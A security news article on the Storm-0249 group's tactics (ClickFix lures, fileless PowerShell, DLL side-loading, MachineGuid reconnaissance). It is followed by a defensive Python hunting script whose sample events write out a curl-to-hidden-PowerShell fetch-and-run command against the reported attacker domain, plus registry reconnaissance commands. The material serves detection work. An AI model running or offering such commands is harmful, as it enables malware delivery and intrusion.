Storm-0249 Shifts Tactics, Uses DLL Sideloading in Ransomware Attack

Storm-0249 Evolves Into Direct Ransomware Attacker Using Advanced Stealth and Persistence Techniques

  • The threat actor known as Storm-0249 is evolving from an initial access broker into a direct ransomware attacker using advanced tactics.
  • It employs domain spoofing, DLL side-loading, and fileless PowerShell execution to bypass security defenses and maintain persistent access.
  • The group leverages social engineering methods like the ClickFix tactic and uses trusted Windows processes to avoid detection.
  • Storm-0249 extracts unique system identifiers such as MachineGuid to prepare for targeted ransomware encryption strategies.
  • These developments signal a shift toward precise, stealthy attacks to support ransomware affiliates such as LockBit and ALPHV.

As of December 2025, the threat group Storm-0249 is adopting new methods to conduct ransomware attacks directly. Previously known as an initial access broker that sold network footholds to other cybercriminals, it now uses domain spoofing, DLL side-loading, and fileless PowerShell execution to get into networks and persist there while evading detection. According to a ReliaQuest report shared with The Hacker News, this shift poses significant challenges for security teams.


Storm-0249, a name assigned by Microsoft, was first publicly identified in September 2024 and has provided access to ransomware and extortion groups such as Storm-0501. In early 2025, threat intelligence reporting tied the group to tax-themed phishing campaigns against U.S. users that distributed the Latrodectus loader and the BruteRatel C4 (BRc4) post-exploitation framework.

The group now uses the ClickFix social engineering tactic: victims are talked into pasting a command into the Windows Run dialog under the pretense of fixing a technical problem. The command uses the legitimate Windows utility curl.exe to fetch a PowerShell script from a look-alike path on an attacker domain (“sgcipl[.]com/us.microsoft.com/bdo/”); the “us.microsoft.com” string sits in the URL path, not the host, so the request actually goes to sgcipl[.]com. The script runs in memory without being written to disk (fileless execution).

The script then installs a malicious MSI package that executes with SYSTEM privileges. The package drops a trojanized DLL named “SentinelAgentCore.dll” into the user’s AppData folder alongside a copy of “SentinelAgentWorker.exe”, a legitimate, signed component of SentinelOne’s endpoint agent. Because Windows searches an application’s own directory first when resolving DLLs, running “SentinelAgentWorker.exe” from that folder loads the rogue DLL (DLL side-loading), which then handles encrypted communication with a command-and-control (C2) server from inside a trusted-looking process.

Storm-0249 also uses built-in Windows command-line tools, reg.exe and findstr.exe, to read unique system identifiers such as the MachineGuid value stored in the registry under HKLM\SOFTWARE\Microsoft\Cryptography. This GUID matters for the ransomware stage because affiliates such as LockBit and ALPHV tie per-victim encryption keys to it, so that files can be decrypted only with the key the attackers hold for that specific machine. ReliaQuest emphasized, “This isn’t just generic reconnaissance – it’s preparation for ransomware affiliates.”
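The three behaviours above (the Run-dialog curl download from a path-spoofed URL, the vendor binary relocated to AppData and side-loading a DLL, and the reg.exe/findstr.exe MachineGuid read) each leave a recognisable shape in process-creation and image-load telemetry. The following is an added hunting example written for this page, not code from ReliaQuest, Microsoft, or the article. It runs four rules over a handful of constructed Sysmon-style events; the user name, paths, parent processes, and command lines are made up, and the expected SentinelOne install directory is an assumption you should replace with your own deployment's value. The attacker domain appears only as a string for matching and is never contacted. The spoofed-URL rule is more general than the single case in the text: it also flags a brand planted as a sub-label of another host (us.microsoft.com.evil.test), not only in the path.

```python
"""Hunting rules for the Storm-0249 tradecraft described above, run over
constructed Sysmon-style events (not real telemetry)."""
import re
from urllib.parse import urlparse

# Brands an attacker may plant in a URL to make it look legitimate.
TRUSTED_BRANDS = ("microsoft.com", "windows.com", "office.com")
URL_RE = re.compile(r"https?://[^\s\"'|]+")
DOWNLOADERS = ("curl.exe", "powershell", "certutil", "bitsadmin", "mshta")
USER_WRITABLE = re.compile(r"\\users\\[^\\]+\\appdata\\|\\programdata\\|\\temp\\", re.I)
CRYPTO_KEY_RE = re.compile(r"(hklm|hkey_local_machine)\\software\\microsoft\\cryptography", re.I)
# Assumed install directory for the vendor binary abused in the article
# (an assumption for this example; check your own deployment).
EXPECTED_INSTALL_DIR = {"sentinelagentworker.exe": "c:\\program files\\sentinelone\\"}


def spoofed_brand_in_url(url: str) -> bool:
    """True when a trusted brand's domain appears anywhere in the URL (path, query,
    or as a sub-label of another host) but the real host is not that brand,
    e.g. https://sgcipl.com/us.microsoft.com/bdo/ or https://us.microsoft.com.evil.test/."""
    p = urlparse(url)
    host = (p.hostname or "").lower()
    if any(host == b or host.endswith("." + b) for b in TRUSTED_BRANDS):
        return False  # genuinely on the brand's domain
    haystack = host + p.path.lower() + "?" + p.query.lower()
    return any(b in haystack for b in TRUSTED_BRANDS)


def _basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def run_dialog_download(ev: dict) -> bool:
    """ClickFix shape: a child of explorer.exe (the Run dialog) whose command
    line invokes a download-capable LOLBIN against a URL."""
    if ev["type"] != "ProcessCreate" or _basename(ev["parent"]) != "explorer.exe":
        return False
    cmd = ev["cmdline"].lower()
    return bool(URL_RE.search(ev["cmdline"])) and any(d in cmd for d in DOWNLOADERS)


def spoofed_url_in_cmdline(ev: dict) -> bool:
    return any(spoofed_brand_in_url(u) for u in URL_RE.findall(ev.get("cmdline", "")))


def vendor_binary_sideload(ev: dict) -> bool:
    """DLL side-loading shape: a known vendor binary running outside its install
    directory and loading a DLL from the same user-writable directory."""
    if ev["type"] != "ImageLoad":
        return False
    image, loaded = ev["image"].lower(), ev["loaded"].lower()
    expected = EXPECTED_INSTALL_DIR.get(_basename(image))
    if expected is None or image.startswith(expected):
        return False
    same_dir = image.rsplit("\\", 1)[0] == loaded.rsplit("\\", 1)[0]
    return same_dir and bool(USER_WRITABLE.search(loaded))


def machineguid_recon(ev: dict) -> bool:
    """reg.exe reading HKLM\\SOFTWARE\\Microsoft\\Cryptography\\MachineGuid, or findstr filtering for it."""
    if ev["type"] != "ProcessCreate":
        return False
    base, cmd = _basename(ev["image"]), ev["cmdline"]
    if base == "reg.exe":
        return bool(CRYPTO_KEY_RE.search(cmd)) and "machineguid" in cmd.lower()
    return base == "findstr.exe" and "machineguid" in cmd.lower()


RULES = {
    "clickfix_run_dialog_download": run_dialog_download,
    "spoofed_brand_url": spoofed_url_in_cmdline,
    "vendor_binary_sideload": vendor_binary_sideload,
    "machineguid_recon": machineguid_recon,
}


def detect(events: list[dict]) -> list[tuple[str, int]]:
    """Return (rule_name, event_index) for every rule that fires."""
    return [(name, i) for i, ev in enumerate(events) for name, rule in RULES.items() if rule(ev)]


# Constructed sample events. User name, paths and command lines are made up;
# the domain and file names are the ones the article reports.
SAMPLE_EVENTS = [
    {"type": "ProcessCreate", "parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": 'cmd.exe /c "curl.exe -s https://sgcipl.com/us.microsoft.com/bdo/ | powershell.exe -nop -w hidden -"'},
    {"type": "ProcessCreate", "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r"reg.exe query HKLM\SOFTWARE\Microsoft\Cryptography /v MachineGuid"},
    {"type": "ProcessCreate", "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\findstr.exe", "cmdline": "findstr.exe /i MachineGuid"},
    {"type": "ImageLoad", "image": r"C:\Users\jdoe\AppData\Roaming\SentinelAgentWorker.exe",
     "loaded": r"C:\Users\jdoe\AppData\Roaming\SentinelAgentCore.dll"},
    # Benign: the same binary running from its (assumed) install directory.
    {"type": "ImageLoad", "image": r"C:\Program Files\SentinelOne\Sentinel Agent\SentinelAgentWorker.exe",
     "loaded": r"C:\Program Files\SentinelOne\Sentinel Agent\SentinelAgentCore.dll"},
    # Benign: an admin's curl from a console against the real vendor domain.
    {"type": "ProcessCreate", "parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\curl.exe",
     "cmdline": "curl.exe -O https://www.microsoft.com/en-us/download/tool.zip"},
]

if __name__ == "__main__":
    for name, idx in detect(SAMPLE_EVENTS):
        ev = SAMPLE_EVENTS[idx]
        print(f"{name:30s} event {idx}: {ev.get('cmdline') or ev['loaded']}")
```

The MachineGuid rule is a hunting signal rather than an alert on its own, since some legitimate inventory scripts read the same value; its weight comes from co-occurring with the Run-dialog download or the relocated vendor binary on the same host. The side-loading rule deliberately keys on the executable being outside its install directory rather than on the DLL name, so it still fires if the attackers rename the DLL or pick a different vendor binary you have listed.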

Taken together, these tactics mark a move from broad phishing toward targeted, stealthy intrusions that abuse trusted signed processes, which complicates detection and response.
